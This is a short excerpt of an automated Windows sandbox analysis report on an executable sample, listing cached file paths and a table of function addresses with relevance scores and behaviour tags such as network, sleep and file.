C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp120[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll

C:\Windows\appcompat\Programs\Amcache.hve

Windows Analysis Report
LisectAVT_2403002B_78.exe

Function 00AA2EC0 Relevance: 54.4, APIs: 16, Strings: 15, Instructions: 165
COMMON

Function 00AA31B0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 223
networksleepfileCOMMON

Function 00AC433E Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Function 00AA2CB0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92
networkfileCOMMON

Function 00AA3510 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42
sleepCOMMON

Function 00AB9EAC Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Function 00AA3F10 Relevance: 4.6, APIs: 3, Instructions: 120
COMMON

Function 00AB71B5 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00AB6670 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00ABA35C Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Function 00AB73D1 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 00AB92B2 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Function 00AA38B0 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Function 00AA4C10 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON